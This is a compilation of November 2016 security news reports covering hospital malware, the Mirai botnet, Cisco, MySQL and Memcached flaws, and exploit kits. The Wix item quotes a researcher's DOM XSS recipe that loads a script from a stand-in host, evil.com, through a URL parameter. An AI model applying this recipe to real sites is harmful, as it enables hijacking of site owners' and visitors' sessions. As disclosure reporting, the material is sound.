Malware used to spy Iran’s nuclear negotiations in the Geneve’s venue
4.11.2016 thehackernews Virus
Switzerland’s attorney general has confirmed to have investigated the presence of spyware in a venue that also hosted talks on Iran’s nuclear negotiations.
Swiss officials confirmed to have found an espionage malware in the computer equipment at Geneva venue, a five-star hotel (believed to be Hotel Président Wilson) that has hosted sensitive talks including Iranian nuclear negotiations.
“Investigations revealed that a significant number of computers (servers and clients) at a hotel in Geneva had been infected with a form of malware,” Office of the Attorney said in a statement on Thursday. “This malware was developed for the purposes of espionage, and is basically used to gather data from the computers infected.”
Source News Dog Today
Clearly gathering information on the nuclear talks is a primary goal for intelligence agencies of any country that are interested to know the evolution of the negotiations with governments involved.
The Swiss prosecutors have already closed the case due to the failure of the attribution of the cyber attack.
“A source said the malware was discovered on computers at the Hotel President Wilson, where talks on Iran’s nuclear work had taken place a month before, following a tip-off from the Swiss intelligence services.”
“The attorney general’s office said it was suspending proceedings because no evidence regarding the perpetrators’ identities had been obtained.
“Investigators raided the hotel 12 May last year after OAD who was investigating over illegal intelligence services operating in the country.” states a post published by Swissinfo.ch.
“Investigations revealed that a significant number of computers [servers and clients] at a hotel in Geneva had been infected with a form of malware,” the state prosecutor said in a statement on Thursday. “This malware was developed for the purposes of espionage and is basically used to gather data from the computers infected.”
The Swiss state prosecutor doesn’t exclude a reopening of the investigation in case new evidence on cyber espionage activities will emerge.
“In Vienna, where the Iranian nuclear talks concluded in July 2015, the state prosecutor has launched two separate investigations into possible espionage. A spokesperson for the justice ministry told the Guardian that the two ongoing investigations were launched in June 2015 after bugging devices were discovered at Palais Coburg.“reported The Guardian.
“When the talks shifted to a luxury hotel in Vienna, the microwave radiation from the surveillance efforts of competing intelligence agencies was so intense that diplomats had to walk some distance from the venue to use their mobile phones.”
The Israeli government is one of the main suspects, but it has always denied accusations of cyber espionage despite a Russian-based security firm speculated the use of a spyware having similarities with the ones used by Israeli cyber spies.
Hospitals of the National Health Service (NHS) network were paralyzed by a malware
4.11.2016 securityaffairs Virus
A malware compromised the NHS network, hundreds of scheduled operations, appointments, and diagnostic procedures have been canceled.
The situation is becoming even more worrying and dangerous, healthcare industry continues to be targeted by hackers and malware.
Cyber attacks on hospitals is a disconcerting trend emerged across the years, they represent a serious threat for data and patient health.
A cyber attack could paralyze a hospital with dramatic repercussion and unpredictable consequences.
On Sunday, a malware compromised the National Health Service (NHS) network, hundreds of scheduled operations, appointments, and diagnostic procedures have been canceled.
The hospitals hit by the malware-based attack are all located in the Lincolnshire, in England. In response to the incident, the IT staff shut down all the systems within its shared IT network aiming to “isolate and destroy” the malware.
Some patients, including major trauma patients, were diverted to the neighboring hospitals.
The hospitals affected by the incident are the Diana Princess of Wales in Grimsby, Scunthorpe general and Goole and District.
The Northern Lincolnshire and Goole NHS Foundation Trust (NLAG) announced that hospital systems in Scunthorpe and Grimsby were infected with a virus on October 30. The foundation classified the issue a ‘Major incident’ on its website and via Twitter.
Segui
NHS NLaG @NHSNLaG
To check which of our appointments are going ahead tomorrow following a major incident, visit our website http://www.nlg.nhs.uk
22:30 - 1 Nov 2016
2 2 Re 1 1 Mi piace
“We have taken the decision, following expert advice, to shut down the majority of our systems so we can isolate and destroy it,” the NHS wrote on its website. “All planned operations, outpatient appointments and diagnostic procedures have been canceled for Wednesday, Nov. 2 with a small number of exceptions.”
At the time I was writing the situation is returning to normal, the major systems are up and running again. The NHS Trust has not provided further details on the malware-based attack neither on a possible data breach.
Security experts confirm that a growing number of cyber-attacks continue to hit hospitals threatening unpatched medical devices.
In late 2015, MaineGeneral Health, a new state of the art hospital located in Augusta, Maine, reported that it had fallen victim of a cyberattack that leaked the names, addresses, and phone numbers for patients of its radiology services since June 2009. The attack is one of many in the past year where targeting of the medical industry, particularly hospitals, is on the rise.
Hollywood Presbyterian Hospital, Methodist Hospital in Henderson, Kentucky, Chino Valley Medical Center, and Desert Valle Hospital are just but a few of the medical facilities hit with a wave of Cryptolocker attacks, costing an untold amount in ransom and cleanup. Then there’s MedStar, the Washington D.C. based hospital chain whose infrastructure was crippled with a virus in late March.
Then there’s MedStar, the Washington D.C. based hospital chain whose infrastructure was crippled with a virus in late March. According to one report some 35,000 employees could not access emails or access patient records. Cybercriminals behind the attack demanded 45 Bitcoins, at the time worth US$45,000, to unlock its systems and threatened to destroy the private key used to encrypt MedStar’s data if payment wasn’t made within ten days. Interestingly, the hackers also gave MedStar the option of releasing one computer at a time for 3 Bitcoins – how nice of them. It’s unknown whether or not MedStar paid the ransom or not but reported four days later they had recovered “90 percent of its functionality.”
The medical industry has become a fertile ground for cybercriminals and an industry that appears to be left lagging behind other critical infrastructures that have focused on hardening its networks for years, like the financial services industry. Hospitals are a smorgasbord of the personal identifiable information and payment systems that make it attractive for snoops, thieves, and extortionists alike.
In February, two German hospitals were infected by a ransomware, in a similar way occurred at the US Hollywood Presbyterian Medical Center.
Back to the NHS Trust case, there is no news about the type of malware that hit the system, someone speculated the malicious code could likely be a ransomware that has previously targeted other hospitals and healthcare facilities.
Cyber security for critical infrastructure, and in particular for hospitals is a must for the cyber strategy of any government.
Cisco patched critical flaws in 900 series routers and Prime Home server
4.11.2016 securityaffairs Vulnerebility
Cisco issued patches for two critical vulnerabilities affecting several products, including Cisco 900 Series Routers and Cisco Prime Home servers.
Cisco has issued patches for two critical vulnerabilities affecting several products, including Cisco 900 Series Routers and Cisco Prime Home server and cloud-based network management platform.
The company published two security advisories to report the issues to his customers. One of the security advisories warns service providers running Cisco ASR 900 Series routers of a flaw, tracked as CVE-2016-6441, in the Transaction Language 1 (TL1) code of the router. This flaw could be exploited remotely by an unauthenticated attacker to execute arbitrary code or force the reload of the affected equipment.
“A vulnerability in the Transaction Language 1 (TL1) code of Cisco ASR 900 Series routers could allow an unauthenticated, remote attacker to cause a reload of, or remotely execute code on, the affected system.” reads the advisory.
“The vulnerability exists because the affected software performs incomplete bounds checks on input data. An attacker could exploit this vulnerability by sending a malicious request to the TL1 port, which could cause the device to reload. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or cause a reload of the affected system.”
The company has made available the updates to fix the flaw and also workarounds to temporarily address the vulnerability.
The second flaw is a critical authentication bypass vulnerability, tracked as CVE-2016-6452, that resides in the web-based graphical user interface of Cisco Prime Home. The flaw could be exploited by a remote attacker to bypass authentication.
The flaw could be exploited by sending a crafted HTTP request to a specific URL that allow the attacker to obtain a valid session identifier for an arbitrary user.
“A vulnerability in the web-based graphical user interface (GUI) of Cisco Prime Home could allow an unauthenticated, remote attacker to bypass authentication. The attacker could be granted full administrator privileges.” reads the advisory published by Cisco.
“The vulnerability is due to a processing error in the role-based access control (RBAC) of URLs. An attacker could exploit this vulnerability by sending a crafted HTTP request to a particular URL. An exploit could allow the attacker to obtain a valid session identifier for an arbitrary user, which would allow the attacker to perform any actions in Cisco Prime Home for which that user is authorized—including users with administrator privileges.”
ISIS Is Watching you: Islamic State Hacking Team Shares Access to Security Cameras Around the Word
4.11.2016 securityaffairs Cyber
BLACKOPS Cyber (BOC) reported to the authorities that a well-known ISIS hacking team was sharing access links to widely used surveillance systems.
BLACKOPS Cyber (BOC), a U.S. based Cyber Intelligence firm, located a new type of threat in October which is indicative of the latest focus of the terrorist organization – technical resource development for lone wolves around the world.
BOC revealed in a report to authorities that the team had identified where a well-known ISIS hacking team was sharing access links as well as vulnerabilities to widely used surveillance systems. Through late Summer and early Fall BOC witnessed the merger of two ISIS hacking groups that posted the surveillance camera links. “It literally took pace before our eyes,” said a BLACKOPS Cyber spokesperson.
The cameras were located around the world, in the United States, Europe, Asia and Latin America. Along with the lists of cameras, the terrorists posted a video on how to access them. After examining the video, a BOC technical operative determined the vulnerability was “a viable rootkit vulnerability that would not require a lot of skill to execute.”
BOC noted that there is a need for video surveillance companies examine their security vulnerabilities and address them as needed, adding that some systems may be vulnerable and others may not.
Recent attacks against the Dyn DNS service powered by a huge IoT botnet highlight the importance to properly address the security of devices such as CCTV and DVR connected to the Internet.
BLACKOPS Cyber stated that their primary concern was that terrorists could use control of the camera’s to aid and conceal the activities of lone wolves. However, the concern for using the access to prepare for an attack exists as well, according to their spokesperson who said, “While the cameras can be used to conceal an attack, they can also be used to plan and execute one. ISIS operatives and lone wolves have been known to surveil an area extensively before carrying out an attack, and this access makes that much easier for them.”
Making the job of carrying out an attack easier is something that ISIS seems to be attempting through technology, according to BLACKOPS Cyber. BOC reports that they have seen an upsurge in ISIS related technical information and training over the past year.
The BOC spokesperson noted, “Technical support for lone wolves has been a recent focus for ISIS operatives. The focus on technical training for new operatives is concerning whether it is the basics of concealing their identities or much more sophisticated technical capabilities.”
For this reason, BOC maintains that it is more important than ever for intelligence agencies to protect their online sources, “ISIS operatives are not only spending a more time online, they are smarter about it. When we share our sources and resources or post critical intelligence channels on social media, they are certain to pick up on it.” According to BOC this can result in the loss of access to intel.
ohio ISIS IMAGE CAPTION: One cameras on the list from ISIS hackers looks provides a view of the
One camera on the list from ISIS hackers looks provides a view of the Square in a U.S city. G-TV camera
About the Author: GAYLE MURRAY
Gayle Murray is currently an analyst in the field of global intelligence and counter-terrorism with over 15 years experience in threat analysis, media relations, and international affairs.
Shadows Kill Mirai Botnet caused an Internet outage in Liberia, what is the next one?
4.11.2016 securityaffairs BotNet
Mirai botnet was used to power a massive DDoS attack against Liberia causing the Internet outage in the entire country with financially devastating results.
Mirai is the malware that a few weeks ago caused a massive Internet outage in the US. Mirai was first spotted this summer by the security expert MalwareMustDie, now media reported the use of the dreaded botnet against Liberia. with financially devastating results.
The financial repercussions of the massive DDoS attack on the country are devastating.
The massive DDoS attacks began a few days ago impacting some Liberian internet providers as explained the security researcher Kevin Beaumont.
Beaumont credited the Mirai botnet for the attacks that hit the African country, he called this botnet #14 “Shadows Kill”, based on the message they sent.
Segui
Mirai Attacks @MiraiAttacks
Botnet #14 - DNS flood for 1 seconds
[Targets]
kevin.lies.in.fear (8.8.8.8/32)
00:11 - 3 Nov 2016
7 7 Re 10 10 Mi piace
“Over the past week we’ve seen continued short duration attacks on infrastructure in the nation of Liberia. Liberia has one internet cable, installed in 2011, which provides a single point of failure for internet access. From monitoring we can see websites hosted in country going offline during the attacks — additionally, a source in country at a Telco has confirmed to a journalist they are seeing intermittent internet connectivity, at times which directly match the attack. The attacks are extremely worrying because they suggest a Mirai operator who has enough capacity to seriously impact systems in a nation state.” Beaumont wrote in a blog post.
The Botnet #14 was able to generate a volume of traffic greater than 500 Gbps, enough to cause a massive outage in a country like Liberia.
“From monitoring, we can see websites hosted in country going offline during the attacks,” Beaumont added.
Unfortunately, it is becoming quite easy to create or rent a botnet powered by the Mirai malware due to the availability of its source code leaked online by the alleged author.
According to Flashpoint who scanned the Internet with the Shodan search engine for flawed IoT devices more than 500,000 vulnerable devices are in the wild. The countries with the highest number of vulnerable devices are Vietnam (80,000), Brazil (62,000) and Turkey (40,000).
Large-scale DDoS attacks continue to represent a serious threat for web services across the world, and IoT devices represent a privileged attack vector due to the lack of security by design. IoT manufacturers are encouraged to seriously consider the approach at the security of their products.
I reached MalwareMustDie for a comment on the real abilities of the Mirai Botnet.
Q: Which are the capabilities of the Mirai Botnet?
A: Mirai botnet can make big damage as per several “demonstration” they did, included Liberia attack. The threat is seriously powerful, as per I firstly mentioned in the Security Affair interview. The way to stop it, are, either we push the effort to arrest ‘skiddes‘ who related to this botnet, and more strict in rule/policy for DDoS abuses, or, put down be more aggressive to take down infected IoT devices. Seriously, time is critical yet many ppl still not acting faster, if we let this happen with the current pace, in this Christmas or new year some countries and services can be shut down too … and they can do that.
Q: Is it possible to use Mirai to shut down a country like the UK or France?
A: If they know which point to attack, YES. They caused a major Internet outage in the United States for some hours, and the US have the strongest internet backbone in this planet.
It is my personal opinion that who released the code online was trying to rapidly increase the size of Mirai botnet. More smoking guns make harder the attribution and this could help crooks to keep lower their profile and nation-state hackers make impossible the attribution of the attacks even against a foreign country.
It is clear that someone is using the Botnet #14 to test a large scale attack probably against some Government.
We have no time, we need a new approach to cyber security, IoT device need security by design.
Počet útoků přes botnety v Evropě raketově roste
4.11.2016 SecurityWorld BotNet
Sofistikovaných útoků řízených servery ze západní Evropy i obětí v tomto regionu rychle stoupá. Jak ukazují data firmy Kaspersky Lab, v červenci až září 2016 byly botnetovými DDoS útoky napadeny cíle celkem v 67 zemích, přičemž vysokou dynamiku je vidět právě v Evropě.
Zatímco v Japonsku, Spojených státech a Rusku počty útoků rostly, počty čínských a jihokorejských obětí naopak znatelně klesly. Ve zmiňovaném čtvrtletí se poprvé mezi prvními 10 zeměmi s nejvyšším počtem zaznamenaných DDoS útoků objevily tři západoevropské státy – Itálie, Francie a Německo.
Tento fakt souvisí se vzrůstajícím počtem aktivních kontrolních C&C serverů v západní Evropě, především ve Velké Británii, Francii a Nizozemsku.
I přes celkově nižší počet zaznamenaných útoků na Čínu bylo na tuto zemi stále cíleno nejvíce útoků – konkrétně jen na populární čínský vyhledávač bylo vedeno dohromady 19 útoků, přičemž byl tento poskytovatel zároveň vystaven nejdéle trvajícímu útoku ve třetím čtvrtletí (184 hodin).
Dnem, kdy byly DDoS útoky za poslední rok nejaktivnější, byl 3. srpen. Servery jednoho amerického poskytovatele služeb v ten den zaznamenaly 1 746 botnetových útoků.
Ve třetím čtvrtletí pokračovaly ve svém růstu počty SYN-DDoS útoků, jež činily 81 % všech registrovaných útoků, přičemž podíl TCP-DDoS a ICMP-DDoS opět klesl.
Rekordní vzestup zaznamenaly také útoky DDoS botů založené na operačním systému Linux, které dosáhly 79% podílu. Příčinou tohoto trendu by mohla být stoupající oblíbenost zařízení internetu věcí (IoT) založených na Linuxech, které jsou čím dál častěji zneužívány k DDoS útokům. Tento trend bude pravděpodobně ještě zesílený po úniku Mirai.
Analytici také zaznamenali navýšení počtu „chytrých“ útoků, které šifrují přenášená data. Typickým příkladem těchto útoků je zasílání relativně malého počtu dotazů šifrovaným spojením na „load-heavy“ části webových stránek (jako jsou vyhledávací formuláře).
Kvůli přenosu šifrovaným kanálem a své nízké intenzitě je pro mnohá speciální bezpečnostní řešení velmi těžké tyto útoky filtrovat.
Hundreds Of Operations Canceled After Malware Hacks Hospitals Systems
3.11.2016 thehackernews Virus
They are not just hacking your email and online banking accounts anymore.
Computer viruses do not distinguish between a personal computer or a hospital machine delivering therapy to patients — and the results could prove deadly.
Cyber attacks on hospitals have emerged as a significant cyber security risk in 2016, which not only threaten highly sensitive information but also potentially harm the very lives of those being protected.
In the latest incident, hundreds of planned operations, outpatient appointments, and diagnostic procedures have been canceled at multiple hospitals in Lincolnshire, England, after a "major" computer virus compromised the National Health Service (NHS) network on Sunday.
In a bright-red alert warning labeled "Major incident" on its website, the Northern Lincolnshire and Goole NHS Foundation Trust (NLAG) said its systems in Scunthorpe and Grimsby were infected with a virus on October 30.
The incident forced the trust to shut down all the major systems within its shared IT network in order to "isolate and destroy" the virus and cancel surgeries.
"We have taken the decision, following expert advice, to shut down the majority of our systems so we can isolate and destroy it," the NHS wrote on its website. "All planned operations, outpatient appointments and diagnostic procedures have been canceled for Wednesday, Nov. 2 with a small number of exceptions."
Some patients, including major trauma patients and high-risk women in labor, were diverted to neighbouring hospitals.
hospital-computer-virus
Although the majority of systems are now back and working, the NHS Trust has not provided any specific information about the sort of virus or malware or if it managed to breach any defense.
The incident took place after the U.S. and Canada issued a joint cyber alert, warning hospitals and other organizations against a surge in extortion attacks that infect computers with Ransomware that encrypts data and demand money for it to be unlocked.
Although it is unclear at the moment, the virus could likely be a ransomware that has previously targeted hospitals and healthcare facilities.
Life Threatening Cyber-Attacks
With the rise in Ransomware threat, we have seen an enormous growth in the malware businesses.
The countless transactions of Bitcoins into the dark web have energized the Ransomware authors to distribute and adopt new infection methods for the higher successful rate.
Today, Ransomware have been a soft target for both Corporates as well as Hospitals.
Since earlier this year, over a dozen hospitals have been targeted by ransomware, enforcing them to pay the ransom amount as per the demand by freezing the central medical systems.
Technological advancement in the medical arena has digitalized patients data in the form of Electronic Medical Record (EMR) in order to save them into the hospital's central database.
Since the delay in patients treatment by temporary locking down their details could even result in the patient's death, the attackers seek 100 percent guarantee ransom by infecting hospitals with Ransomware.
Due to this reason, in most of the cases, hospitals generally agrees to pay the ransom amount to the attackers.
Earlier this year, the Los Angeles-based Presbyterian Medical Center paid $17,000 in Bitcoins to cyber crooks in order to restore access to its electronic medical systems, after a ransomware virus hit the hospital.
Also back in April, the MedStar Health chain that runs a number of hospitals in the Baltimore and Washington area, was attacked with Samsam ransomware (or Samas) that encrypted sensitive data at the hospitals.
Followingly, many more hospitals, including Methodist Hospital in Henderson and Kentucky, Desert Valley Hospital in California and Chino Valley Medical Center, have been infected with Ransomware.
19-Year-Old Teenage Hacker Behind DDoS-for-Hire Service Pleads Guilty
3.11.2016 thehackernews Hacking
Due to the worldwide promotion of Mirai botnet that knocked down half of the Internet last Friday, hackers and even script kiddies have started creating their own botnet networks by hacking millions of IoT devices and selling them as DDoS-for-hire service to overwhelm targets with data.
A 19-year-old student from Hertford has pled guilty to running one such DDoS-for-hire service that shortly became one of the most popular DDoS booter tools in the market to conduct distributed denial of service (DDoS) attacks.
Dubbed Titanium Stresser, the tool was used to conduct coordinated DDoS attacks around the world and brought Adam Mudd an income of more than US$385,000 (£315,000 A$505,000), according to the Eastern Region Special Operations Unit (ERSOU).
On 28 October at the Old Bailey, Mudd pleaded guilty to two counts of the Computer Misuse Act and one count of money laundering offense and will be sentenced in December.
Mudd, who was arrested at his home in 2015, admitted to committing unauthorized acts of creating the DDoS service, using it himself, and then renting it to other cyber criminals through the service's website.
Titanium-Stresser-ddos-tool
Prosecutor Jonathan Polnay says the teenager allegedly launched 592 DDoS attacks against 181 IP addresses between December 2013 and March last year.
"Titanium Stresser is a computer program created by the defendant, and it is not an unimpressive piece of software in terms of design," Polnay told the court. "It carried out DDoS attacks, and it takes down computer networks and websites."
Moreover, from the detailed logs authorities discovered in his home, investigators were able to determine that other criminals had used Titanium Stresser to launch a whopping 1.7 Million DDoS attacks on targets worldwide.
It has also been believed that the infamous Lizard Squad gang used the source code of Titanium Stresser as a base for its Lizard Stresser -- another DDoS-for-hire service most famously used to take down the PlayStation and Xbox Live networks in 2014.
Mudd is scheduled to be sentenced in December 2016.
Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released)
3.11.2016 thehackernews Vulnerebility
Over a month ago we reported about two critical zero-day vulnerabilities in the world's 2nd most popular database management software MySQL:
MySQL Remote Root Code Execution (CVE-2016-6662)
Privilege Escalation (CVE-2016-6663)
At that time, Polish security researcher Dawid Golunski of Legal Hackers who discovered these vulnerabilities published technical details and proof-of-concept exploit code for the first bug only and promised to release details of the second bug (CVE-2016-6663) later.
On Tuesday, Golunski has released proof-of-concept (POC) exploits for two vulnerabilities:
One is the previously promised critical privilege escalation vulnerability (CVE-2016-6663), and another is a new root privilege escalation bug (CVE-2016-6664) that could allow an attacker to take full control over the database.
Both the vulnerabilities affect MySQL version 5.5.51 and earlier, MySQL version 5.6.32 and earlier, and MySQL version 5.7.14 and earlier, as well as MySQL forks — Percona Server and MariaDB.
Privilege Escalation/Race Condition Bug (CVE-2016-6663)
The more severe of the two is the race condition bug (CVE-2016-6663) that can allow a low-privileged account (with CREATE/INSERT/SELECT grants) with access to the affected database to escalate their privileges and execute arbitrary code as the database system user (i.e. 'mysql').
Once exploited, an attacker could successfully gain access to all databases within the affected database server.
Root Privilege Escalation (CVE-2016-6664)
Another critical flaw in MySQL database is a root privilege escalation bug that could allow attackers with 'MySQL system user' privilege to further escalate their privileges to root user, allowing them to fully compromise the system.
The issue actually stems from unsafe file handling of error logs and other files, which comes under MySQL system user privileges, allowing it to be replaced with an arbitrary system file, which opens the door to root privileges.
What's more troublesome? An attacker with a low-privileged account can also achieve root privilege by first exploiting the Privilege Escalation flaw (CVE-2016-6663) to become 'MySQL system user' and thus allow attackers to fully compromise the targeted server.
All these vulnerabilities could be exploited in shared hosting environments where users are assigned access to separate databases. By exploiting the flaws, they could gain access to all databases.
Golunski has published the proof-of-concept exploit code (Exploit 1, Exploit 2) for both the flaws and will soon upload videos.
MySQL has fixed the vulnerabilities and all of the patches ultimately found their way into Oracle's quarterly Critical Patch Update last month.
Administrators are strongly advised to apply patches as soon as possible in order to avoid hackers seeking to exploit the vulnerabilities.
If you are unable to immediately apply patches, then as a temporary mitigation you can also disable symbolic link support within your database server configuration to this setting — my.cnf to symbolic-links = 0 — in an attempt to protect yourself against cyber attacks.
Critical DOM XSS flaw on Wix.com put million websites at risk
3.11.2016 securityaffairs Vulnerebility
A DOM-based cross-site scripting vulnerability in the cloud-based development platform Wix.com put million websites at risk.
The cloud-based development platform Wix.com is affected by a DOM-based cross-site scripting vulnerability that could be exploited by attackers to gain full control over any website running on the popular platform. Millions of websites hosted on Wix.com are potentially at risk.
At the time I was writing the flaw is still present as confirmed by Matt Austin (@mattaustin), senior security research engineer with Contrast Security, who discovered the issue.
“DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.” reads the description published by the OWASP.
DOM Based XSS is quite different from an XSS attack wherein the malicious payload is provided in the response page due to a server-side vulnerability.
Below an excerpt from Austin’s blog post.
“Wix.com has a severe DOM XSS vulnerability that allows an attacker complete control over any website hosted at Wix. Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website.
TL;DR:
Add: ?ReactSource=http://evil.com to any URL for any site created on wix.com.
Make sure evil.com hosts a malicious file at /packages-bin/wixCodeInit/wixCodeInit.min.js
Here’s an example exploit occurring, causing a reflected payload to occur:
Austin attempted several times to report the vulnerability to Wix.com without success, he said since early October.
Wix.com declared that there are 86 million users currently adopting its platform.
Austin detailed two differed attack scenarios, in one case a Wix website owner is lured by attackers into visiting a malicious URL loaded with a specially crafted JavaScript that can hijack the target’s browser session. The attacker can gain the victim’s browser session and act on his behalf with full control on the website.
“Administrator control of a wix.com site could be used to widely distribute malware, create a dynamic, dsitributed, browser-based botnet, mine cryptocurrency, and otherwise generally control the content of the site as well as the users who use it.” wrote Austin.
In a second attack scenario, a user is lured to a Wix website by a specially crafted URL that loads JavaScript into the targeted Wix.com site via a DOM-based XSS attack. A Wix.com-based website could be modified by the attacker for a specific browser session to serve malicious code.
In both scenarios, attackers need to host malicious JavaScript on a server and point to it within a URL. (i.e. “http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”).
Sundown exploit kit – Conquering the criminal underground
3.11.2016 securityaffairs Exploit
Cisco Talos group analyzed the evolution of the Sundown exploit kit that over the past six months has become responsible for a large number of infections.
Over the past months, the threat landscape for exploit kits is rapidly changing. Angler EK, Neutrino EK, and Nuclear EK that for years monopolized the criminal underground disappeared.
Now, researchers at Cisco Talos group analyzed the rapid evolution of a new threat, the Sundown exploit kit that over the past six months has become responsible for a large number of infections.
“Over the last six months the exploit kit landscape has seen some major changes.” reads a blog post published by the Talos Group. “What remains is a group of smaller exploit kits vying for pole position in an industry that continues to generate millions of dollars from payloads such as ransomware and banking trojans.”
“It’s now time to turn to another exploit kit that is active on the landscape, Sundown. The Sundown exploit kit has previously been part of a second tier of exploit kits that includes Magnitude and Sweet Orange. These kits successfully compromise users, but typically are not accompanied with the advanced techniques and wide-spread use of the other major exploit kits. It’s not to say these kits aren’t significant threats, but from a potential victim perspective they historically do not have the reach associated with other EKs from before such as Angler or RIG.”
The Sundown EK ranks today at the second place, behind RIG EK that is the most used crimeware kit in the criminal ecosystem.
Threat actors behind the Sundown exploit kit leverage on an infrastructure composed of 80,000 malicious subdomains associated with more than 500 domains.
The experts observed that crooks behind the Sundown exploit kit criminals are using wildcards for subdomains which are exponentially growing the number of routes for malicious traffic to servers hosting the dreaded EK.
The downside to the use of wildcards is the impact on the core domain. If the domain is active, if someone tries to resolve that particular domain, it will redirect to the malicious server used by the crooks.
In one case, the researchers observed in a 24-hour period a particular Sundown domain generating three subdomains a minute.
“For a 24 hour period this particular Sundown campaign was seen generating approximately 3 subdomains a minute for the entire day.” states the analysis.
Count of Unique Sundown Subdomains by Day (Talos analysis)
While the RIG EK was used to dropping a variety of malware, including malicious payloads, banking Trojans, and data stealers, the Sundown exploit kit was only used to serve banking Trojans. Talos has observed Sundown campaigns leveraging both Adobe Flash and Silverlight vulnerabilities to hack into victims’ systems.
“One interesting aspect is that they used standard extensions for those files. All requests for flash files end in “.swf” and all silverlight requests end in “.xap” which isn’t particularly common for exploit kits as they typically will try and obfuscate the activity.” continues the analysis.
Talos highlighted the blunder made by the threat actors, browsing directly to an active Sundown landing page without any parameters the researchers retrieved a Base64 encoded Sundown Logo instead of getting some empty data or a 404 data.
The text on the image states “Yugoslavian Business Network.”
For more information give a look at the report that includes also the IOC for the Sundown exploit kit:
Multiple Critical Remotely Exploitable Flaws Discovered in Memcached Caching System
2.11.2016 thehackernews Vulnerebility
Hey Webmasters, are you using Memcached to boost the performance of your website?
Beware! It might be vulnerable to remote hackers.
Three critical Remote Code Execution vulnerabilities have been reported in Memcached by security researcher Aleksandar Nikolich at Cisco Talos Group that expose major websites, including Facebook, Twitter, YouTube, Reddit, to hackers.
Memcached is a fabulous piece of open-source distributed caching system that allows objects to be stored in memory. It has been designed to speed up dynamic web applications by reducing stress on the database that helps administrators to increase performance and scale web applications.
Memcached is widely used by thousands upon thousands of websites, including popular social networking sites such as Facebook, Flickr, Twitter, Reddit, YouTube, Github, and many more.
Nikolich says that he discovered multiple integer overflow bugs in Memcached that could be exploited to remotely run arbitrary code on the targeted system, thereby compromising the many websites that expose Memcache servers accessible over the Internet.
The vulnerabilities actually reside in "various Memcached functions that are used in inserting, appending, prepending, or modifying key-value data pairs."
CVE-2016-8704: Memcached Server Append/Prepend Remote Code Execution Vulnerability
CVE-2016-8705: Memcached Server Update Remote Code Execution Vulnerability
CVE-2016-8706: Memcached Server SASL Authentication Remote Code Execution Vulnerability
Hackers Can Remotely Steal Sensitive Information
If exploited, the vulnerabilities could allow attackers to send repeat specifically-crafted Memcached commands to the targeted servers.
Moreover, the flaws could also be exploited to leak sensitive process information that can further be used to bypass standard exploitation mitigations, like ASLR (Address Space Layout Randomisation), making the attacks reliable and considerably "severe."
By default, Memcached service installed on your server is available to the world on TCP port 11211, so it has always been strongly recommended to limit its access within a trusted environment, behind the firewall.
So, if you have not yet updated your software to the latest release and Memcached service is publically accessible, an attacker can simply exploit these vulnerabilities to remotely steal sensitive information cached by the server without your knowledge.
What's even worse? These flaws could allow hackers to replace cached content with their malicious one in order to deface the website, serve phishing pages and malicious links to hijack victim's machine, placing hundreds of millions of online users at risk.
Patch your Memcached Server Now!
The integer overflow flaws in Memcached affect Memcached version 1.4.31 and earlier.
The researcher notified Memcached of the flaws and the company only took two days to build a patch on 31st October.
Memcached says the critical remote code execution flaws "are related to the binary protocol as well as SASL authentication of the binary protocol," but has been fixed in the latest release.
Customers are advised to apply the patch even to Memcached deployments in "trusted" environments, as attackers with existing access could target vulnerable servers to move laterally within those networks.
Simplifying SSH keys and SSL Certs Management across the Enterprise using Key Manager Plus
2.11.2016 thehackernews Safety
Simplifying SSH keys and SSL Certs Management across the Enterprise using Key Manager Plus
With rapidly growing web-based services and widely expanding locations, organizations are using more and more SSL certificates as well as SSH keys than ever.
From authentication, confidentiality, and integrity to preventing the organization from industrial espionage, SSL certificates play an important role.
Managing SSL certificates across networks to ensure protection and prevent unanticipated failures is critical, and it also becomes complicated with multiple locations, divisions as well as the fastest growing use of external cloud-based services.
This not only complicates the process of managing individual SSL certificate and SSH key for an administrator but also costs organizations heavily.
A key solution for this issue is to use an advanced and efficient SSL certificate and SSH Key management system.
An effective solution enables an organization to know what kinds of certificates and keys it has, simplifies certificate discovery and monitor across multiple vendors, and also automates certificate renewal and transfer process.
We recently got an opportunity to test and review Key Manager Plus from ManageEngine, which is a division of Zoho Corporation that develops remote administration software for IT businesses.
And we were quite impressed by this product that simplifies even complex processes of key management, where most organizations fail, leaving themselves vulnerable to cyber attacks.
ManageEngine Key Manager Plus
ManageEngine-Key-Manager-Plus-tool.png
ManageEngine Key Manager Plus is a comprehensive, web-based solution that offers centralized management and visibility over the SSL certificates and SSH keys across any organization and helps administrators accurately monitor and manage them.
This application comes with a web-based interface that works on any modern web browser such as Edge, Firefox, and Chrome and you can easily deploy it on your computer with an automated installer.
The dashboard of this application is designed in such a way that after login, you get a broad and easily understandable graphical presentation of all digital assets (SSL certs and SSH keys) used by your organization.
Its user interface and easy to navigate features offer users to keep track of all important details, like the algorithm's encryption type, key length, the creation date of any issue and control new certificate signing requests, as well as access to wider range of tools.
SSL-SSH-Key-Manager-Plus-ManageEngine
Besides centrally creating and deploying new keys, ManageEngine Key Manager Plus also allows administrators to harden security policies by:
1. Periodically Rotating Key Pairs: Automatically rotating privileged SSH key pairs prevents misuse of keys, reduces security risks, meets compliance requirements and minimizes the operational burden on IT teams.
2. Delete Unwanted Keys: It is always important to monitor the environment in order to determine which keys are no longer in use and removing them. Key Manager Plus does same. It prevents unauthorized access to privileged accounts by removing unwanted SSH keys from vulnerable endpoints.
3. Terminate or Regulate access: Generally, in a large organization, SSH access is neither controlled nor monitored, which is a cause of most cyber threats to an organization. Administrators can easily monitor and terminate access anytime to prevent violations by obsolete accounts.
4. Alerts and Notifications: Besides key management, it is always important for an administrator to keep track of SSL certificates, which are about to expire or invalid in order to prevent downtime. This application allows you to set customizable and recurring notifications that alert you when the validity of your SSL cert is about to expire.
Switching to SHA-2 SSL Certificates [Migration Guide]
Nearly a million websites on the Internet are using an insecure algorithm, and leading web browsers, including Chrome and Firefox, have already declared that they could start rejecting website using potentially vulnerable SHA-1 certificates.
